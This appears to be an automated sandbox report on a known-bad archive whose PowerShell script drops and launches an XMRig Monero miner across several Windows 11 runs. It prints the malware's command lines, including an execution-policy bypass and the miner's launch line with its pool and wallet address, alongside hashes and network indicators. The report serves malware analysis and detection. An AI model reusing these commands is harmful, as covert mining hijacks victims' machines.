Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-04 03:15
Signatures
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:51
Platform
win11-20240611-en
Max time kernel
1791s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3672 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3672 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/3672-0-0x00007FFCC4293000-0x00007FFCC4295000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i41gprcg.j2u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3672-9-0x00000286AD0F0000-0x00000286AD112000-memory.dmp
memory/3672-10-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/3672-11-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/3672-12-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/3672-14-0x00000286C5B50000-0x00000286C5B62000-memory.dmp
memory/3672-15-0x00000286C5A40000-0x00000286C5A4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4796-46-0x00000232A7F20000-0x00000232A7F40000-memory.dmp
memory/4796-47-0x00000232A7F70000-0x00000232A7F90000-memory.dmp
memory/4796-48-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/3672-49-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/4796-52-0x00000232A7FB0000-0x00000232A7FD0000-memory.dmp
memory/4796-51-0x00000232A7F90000-0x00000232A7FB0000-memory.dmp
memory/4796-50-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/3672-53-0x00007FFCC4293000-0x00007FFCC4295000-memory.dmp
memory/3672-54-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/4796-55-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-56-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-57-0x00000232A7F90000-0x00000232A7FB0000-memory.dmp
memory/4796-58-0x00000232A7FB0000-0x00000232A7FD0000-memory.dmp
memory/4796-59-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-60-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-61-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-62-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-63-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-64-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-65-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-66-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-67-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-68-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-69-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-70-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-71-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-72-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-73-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-74-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-75-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-76-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-77-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-78-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-79-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-80-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-81-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-82-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-83-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-84-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-85-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-86-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-87-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-88-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-89-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-90-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-91-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-92-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-93-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-94-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-95-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-96-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-97-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-98-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-99-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-100-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-101-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-102-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-103-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-104-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-105-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-106-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-107-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-108-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-109-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-110-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-111-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-112-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-113-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-114-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-115-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-116-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/4796-117-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win11-20240611-en
Max time kernel
1791s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4744 wrote to memory of 2916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4744 wrote to memory of 2916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4744-0-0x00007FFC00583000-0x00007FFC00585000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lptlkqjq.bqy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4744-6-0x00000144F0120000-0x00000144F0142000-memory.dmp
memory/4744-10-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/4744-11-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/4744-12-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/4744-14-0x00000144F01B0000-0x00000144F01C2000-memory.dmp
memory/4744-15-0x00000144F01A0000-0x00000144F01AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2916-46-0x0000023C112B0000-0x0000023C112D0000-memory.dmp
memory/2916-47-0x0000023C12AB0000-0x0000023C12AD0000-memory.dmp
memory/2916-48-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/4744-49-0x00007FFC00583000-0x00007FFC00585000-memory.dmp
memory/4744-50-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/2916-51-0x0000023C12AD0000-0x0000023C12AF0000-memory.dmp
memory/2916-52-0x0000023C12AF0000-0x0000023C12B10000-memory.dmp
memory/4744-54-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/2916-53-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/4744-55-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/2916-56-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-57-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-58-0x0000023C12AD0000-0x0000023C12AF0000-memory.dmp
memory/2916-59-0x0000023C12AF0000-0x0000023C12B10000-memory.dmp
memory/2916-60-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-61-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-62-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-63-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-64-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-65-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-66-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-67-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-68-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-69-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-70-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-71-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-72-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-73-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-74-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-75-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-76-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-77-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-78-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-79-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-80-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-81-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-82-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-83-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-84-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-85-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-86-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-87-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-88-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-89-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-90-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-91-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-92-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-93-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-94-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-95-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-96-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-97-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-98-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-99-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-100-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-101-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-102-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-103-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-104-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-105-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-106-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-107-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-108-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-109-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-110-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-111-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-112-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-113-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-114-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-115-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-116-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-117-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-118-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
